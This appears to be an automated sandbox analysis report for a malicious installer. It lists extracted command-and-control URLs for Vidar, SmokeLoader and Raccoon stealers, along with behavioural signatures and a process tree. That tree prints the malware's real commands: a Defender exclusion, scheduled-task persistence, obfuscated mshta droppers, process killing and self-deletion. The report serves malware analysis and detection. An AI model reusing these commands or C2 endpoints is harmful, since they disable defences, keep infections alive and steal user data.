Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
113s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
08-10-2021 05:38
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Score
10/10
Malware Config
Extracted
Family
vidar
Version
41.2
Botnet
916
C2
https://mas.to/@serg4325
Attributes
-
profile_id
916
Extracted
Family
smokeloader
Version
2020
C2
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Version
1.8.2
Botnet
3a6818b104313fce1772361ea1977d608ac93da0
Attributes
-
url4cnc
http://teletop.top/kaba4ello
http://teleta.top/kaba4ello
https://t.me/kaba4ello
rc4.plain
rc4.plain
Extracted
Family
vidar
Version
41.2
Botnet
937
C2
https://mas.to/@serg4325
Attributes
-
profile_id
937
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar Stealer 4 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 17 IoCs
-
Loads dropped DLL 9 IoCs
-
Themida packer 3 IoCs
Detects Themida, an advanced Windows software protection system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 4 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\PdL_1oO6wpi_LGEVgrwkZ_dx.exe"C:\Users\Admin\Pictures\Adobe Films\PdL_1oO6wpi_LGEVgrwkZ_dx.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\iszkLT_vFVafbOzsXVopjb3E.exe"C:\Users\Admin\Pictures\Adobe Films\iszkLT_vFVafbOzsXVopjb3E.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\bvsEbAFv8guAkJR_qPMLxpsy.exe"C:\Users\Admin\Pictures\Adobe Films\bvsEbAFv8guAkJR_qPMLxpsy.exe"6⤵
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\GSCXJXNhyZWDqvEKiGDwj5xl.exe"C:\Users\Admin\Pictures\Adobe Films\GSCXJXNhyZWDqvEKiGDwj5xl.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\fQfWX7gJc9orXNPgR1hHPSCV.exe"C:\Users\Admin\Pictures\Adobe Films\fQfWX7gJc9orXNPgR1hHPSCV.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nFeNc2kehtHUrqXiZrYvZ3ot.exe"C:\Users\Admin\Pictures\Adobe Films\nFeNc2kehtHUrqXiZrYvZ3ot.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 12207⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EBTvJII5C1uiTmKWti0lAKF5.exe"C:\Users\Admin\Pictures\Adobe Films\EBTvJII5C1uiTmKWti0lAKF5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\sTvRgd88Pnnpc9y3lhCkZid5.exe"C:\Users\Admin\Pictures\Adobe Films\sTvRgd88Pnnpc9y3lhCkZid5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\_BO2hihdicETyLfVEYucSleq.exe"C:\Users\Admin\Pictures\Adobe Films\_BO2hihdicETyLfVEYucSleq.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 2487⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PjVkRUxcjyxSueg6q8hayeR3.exe"C:\Users\Admin\Pictures\Adobe Films\PjVkRUxcjyxSueg6q8hayeR3.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\1HdiB5UzWLVbwBEdSL3syMbk.exe"C:\Users\Admin\Pictures\Adobe Films\1HdiB5UzWLVbwBEdSL3syMbk.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\eEPvi79kjhCH9dVXGFw3OpAR.exe"C:\Users\Admin\Pictures\Adobe Films\eEPvi79kjhCH9dVXGFw3OpAR.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CQ1x3AWP_G2q1NtRd_gke3KU.exe"C:\Users\Admin\Pictures\Adobe Films\CQ1x3AWP_G2q1NtRd_gke3KU.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Lkz2ovxbwHff_a9sVZGBb3Go.exe"C:\Users\Admin\Pictures\Adobe Films\Lkz2ovxbwHff_a9sVZGBb3Go.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ZPMFurQazo9qZNOzthQ9KqYJ.exe"C:\Users\Admin\Pictures\Adobe Films\ZPMFurQazo9qZNOzthQ9KqYJ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\vSOVDcvzq8JjYgUNSkFHAEo4.exe"C:\Users\Admin\Pictures\Adobe Films\vSOVDcvzq8JjYgUNSkFHAEo4.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\vSOVDcvzq8JjYgUNSkFHAEo4.exe"C:\Users\Admin\Pictures\Adobe Films\vSOVDcvzq8JjYgUNSkFHAEo4.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BLH9_uJX07SeYZy4DIQg9FU4.exe"C:\Users\Admin\Pictures\Adobe Films\BLH9_uJX07SeYZy4DIQg9FU4.exe"6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hjB2G6r0hCnokBo0xrnNIA92.exe"C:\Users\Admin\Pictures\Adobe Films\hjB2G6r0hCnokBo0xrnNIA92.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\ZBxskK_Tx1TesjICPGChzgBi.exe"C:\Users\Admin\Pictures\Adobe Films\ZBxskK_Tx1TesjICPGChzgBi.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\ZBxskK_Tx1TesjICPGChzgBi.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\ZBxskK_Tx1TesjICPGChzgBi.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zr5MWhSdX8nssdft6tv5y3jz.exe"C:\Users\Admin\Pictures\Adobe Films\zr5MWhSdX8nssdft6tv5y3jz.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\6MlqnuWrTjmG9S8FFcUpZGax.exe"C:\Users\Admin\Pictures\Adobe Films\6MlqnuWrTjmG9S8FFcUpZGax.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\m9Bn_d6Qr9xS2mweHrrxa16j.exe"C:\Users\Admin\Pictures\Adobe Films\m9Bn_d6Qr9xS2mweHrrxa16j.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\m9Bn_d6Qr9xS2mweHrrxa16j.exe"C:\Users\Admin\Pictures\Adobe Films\m9Bn_d6Qr9xS2mweHrrxa16j.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PrQ25J3R_129DPN0GSfQoOpb.exe"C:\Users\Admin\Pictures\Adobe Films\PrQ25J3R_129DPN0GSfQoOpb.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Hlosk9uw8BbFwVWYz9OIxxtV.exe"C:\Users\Admin\Pictures\Adobe Films\Hlosk9uw8BbFwVWYz9OIxxtV.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\KqPg3BoCyhi7OXTZEYVciprV.exe"C:\Users\Admin\Pictures\Adobe Films\KqPg3BoCyhi7OXTZEYVciprV.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\KqPg3BoCyhi7OXTZEYVciprV.exe"C:\Users\Admin\Pictures\Adobe Films\KqPg3BoCyhi7OXTZEYVciprV.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\w8Tpn7cxZfs82ml68wgCEVn9.exe"C:\Users\Admin\Pictures\Adobe Films\w8Tpn7cxZfs82ml68wgCEVn9.exe"6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 6566⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 6766⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 8086⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 8126⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 8846⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 8686⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 11046⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu1628aafb3efd7c3d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1628aafb3efd7c3d.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu1628aafb3efd7c3d.exe /f7⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5352073.scr"C:\Users\Admin\AppData\Roaming\5352073.scr" /S6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5744367.scr"C:\Users\Admin\AppData\Roaming\5744367.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\4157100.scr"C:\Users\Admin\AppData\Roaming\4157100.scr" /S6⤵
-
-
C:\Users\Admin\AppData\Roaming\1539802.scr"C:\Users\Admin\AppData\Roaming\1539802.scr" /S6⤵
-
-
C:\Users\Admin\AppData\Roaming\6059293.scr"C:\Users\Admin\AppData\Roaming\6059293.scr" /S6⤵
-
-
C:\Users\Admin\AppData\Roaming\1932722.scr"C:\Users\Admin\AppData\Roaming\1932722.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\1932722.scr"C:\Users\Admin\AppData\Roaming\1932722.scr"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 5728⤵
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu164ba03be19.exe6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu164ba03be19.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-R8DVV.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-R8DVV.tmp\Thu16f3de88a335950bb.tmp" /SL5="$50048,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f3de88a335950bb.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TI998.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-TI998.tmp\Thu16f3de88a335950bb.tmp" /SL5="$40080,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu16f3de88a335950bb.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-IT6EM.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-IT6EM.tmp\postback.exe" ss19⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵
-
C:\0ab24a46fc311a48f3d626\Setup.exeC:\0ab24a46fc311a48f3d626\\Setup.exe /q /norestart /x86 /x64 /web10⤵
-
C:\0ab24a46fc311a48f3d626\SetupUtility.exeSetupUtility.exe /aupause11⤵
-
-
C:\0ab24a46fc311a48f3d626\SetupUtility.exeSetupUtility.exe /screboot11⤵
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS09B52AB4\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Local\Temp\E86D.exeC:\Users\Admin\AppData\Local\Temp\E86D.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.6MB
-
Filesize
6.0MB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
372KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.0MB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
80KB
-
Filesize
80.2MB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
41.6MB
-
Filesize
42.0MB
-
Filesize
856KB
-
Filesize
1.6MB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
41.7MB
-
Filesize
696KB
-
Filesize
84KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
42.1MB
-
Filesize
6.0MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
580KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
272KB
-
Filesize
4KB